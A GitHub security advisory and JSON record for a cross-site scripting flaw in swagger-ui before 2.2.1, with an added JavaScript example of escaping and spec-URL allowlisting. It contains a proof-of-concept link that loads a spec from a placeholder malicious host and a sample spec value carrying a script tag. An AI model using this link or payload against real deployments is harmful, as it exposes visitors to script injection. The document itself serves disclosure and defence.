GHSA-7F59-X49P-V8MQ

Vulnerability from github – Published: 2020-09-01 15:28 – Updated: 2021-09-23 21:29
Summary
Cross-Site Scripting in swagger-ui
Details

Affected versions of `swagger-ui` are vulnerable to cross-site scripting in both the `consumes` and `produces` parameters of the swagger JSON document for a given API.

Additionally, `swagger-ui` allows users to load arbitrary swagger JSON documents via the query string parameter `url`, allowing an attacker to exploit this attack against any user that the attacker can convince to visit a crafted link.

Proof of Concept

```
http://<USER_HOSTNAME>/swagger-ui/index.html?url=http://<MALICIOUS_HOSTNAME>/malicious-swagger-file.json
```

Recommendation

Update to version 2.2.1 or later.
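As an added example (not swagger-ui's own code; the unsafe renderer is an assumed simplification of the flaw described above, and the function names and sample spec are constructed), the following JavaScript shows why unescaped `consumes`/`produces` values become markup, a hardened renderer that validates them as media types and escapes them, and an origin allowlist for the `url` parameter so only trusted spec documents are loaded.

```javascript
// Added example, not swagger-ui code. Demonstrates the two issues in the
// advisory: (1) media-type strings rendered into HTML without escaping,
// (2) an unrestricted `?url=` parameter that loads any spec document.

// Constructed sample spec: one `consumes` entry carries markup, not a media type.
const SAMPLE_SPEC = {
  consumes: ["application/json", "<script>x()</script>"],
  produces: ["application/json; charset=utf-8"],
};

// Minimal HTML escaping suitable for text nodes and quoted attribute values.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// type/subtype with optional ";name=value" parameters; no markup characters allowed.
const MEDIA_TYPE_RE =
  /^[A-Za-z0-9][\w.+-]*\/[A-Za-z0-9][\w.+-]*(?:\s*;\s*[\w.-]+=[\w.+-]+)*$/;

function isValidMediaType(value) {
  return typeof value === "string" && MEDIA_TYPE_RE.test(value);
}

// Assumed vulnerable pattern: spec values concatenated straight into markup.
function renderMediaTypesUnsafe(list) {
  return "<ul>" + list.map((v) => `<li>${v}</li>`).join("") + "</ul>";
}

// Hardened: drop anything that is not a media type, escape what remains.
function renderMediaTypesSafe(list) {
  const kept = list.filter(isValidMediaType);
  return "<ul>" + kept.map((v) => `<li>${escapeHtml(v)}</li>`).join("") + "</ul>";
}

// Allowlist for the `url` query parameter: same-origin specs, plus any
// explicitly configured origins; rejects non-http(s) schemes and unparsable input.
function isAllowedSpecUrl(candidate, pageOrigin, extraOrigins = []) {
  let parsed;
  try { parsed = new URL(candidate, pageOrigin); } catch { return false; }
  if (parsed.protocol !== "https:" && parsed.protocol !== "http:") return false;
  return parsed.origin === pageOrigin || extraOrigins.includes(parsed.origin);
}
```

The unsafe renderer reproduces the advisory's failure mode on the constructed spec; the safe one yields only the `application/json` entry, and a cross-origin `url` value is refused unless its origin is configured.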


{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "swagger-ui"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.2.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2016-1000226"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2020-08-31T18:11:35Z",
    "nvd_published_at": null,
    "severity": "CRITICAL"
  },
  "details": "Affected versions of `swagger-ui` are vulnerable to cross-site scripting in both the `consumes` and `produces` parameters of the swagger JSON document for a given API.\n\nAdditionally, `swagger-ui` allows users to load arbitrary swagger JSON documents via the query string parameter `url`, allowing an attacker to exploit this attack against any user that the attacker can convince to visit a crafted link.\n\n## Proof of Concept\n\n```\nhttp://\u003cUSER_HOSTNAME\u003e/swagger-ui/index.html?url=http://\u003cMALICIOUS_HOSTNAME\u003e/malicious-swagger-file.json\n````\n\n\n\n## Recommendation\n\nUpdate to version 2.2.1 or later.",
  "id": "GHSA-7f59-x49p-v8mq",
  "modified": "2021-09-23T21:29:50Z",
  "published": "2020-09-01T15:28:45Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-1000226"
    },
    {
      "type": "WEB",
      "url": "https://github.com/swagger-api/swagger-ui/issues/1866"
    },
    {
      "type": "WEB",
      "url": "https://github.com/swagger-api/swagger-ui/pull/1867"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/swagger-api/swagger-ui"
    },
    {
      "type": "WEB",
      "url": "https://www.npmjs.com/advisories/123"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [],
  "summary": "Cross-Site Scripting in swagger-ui"
}

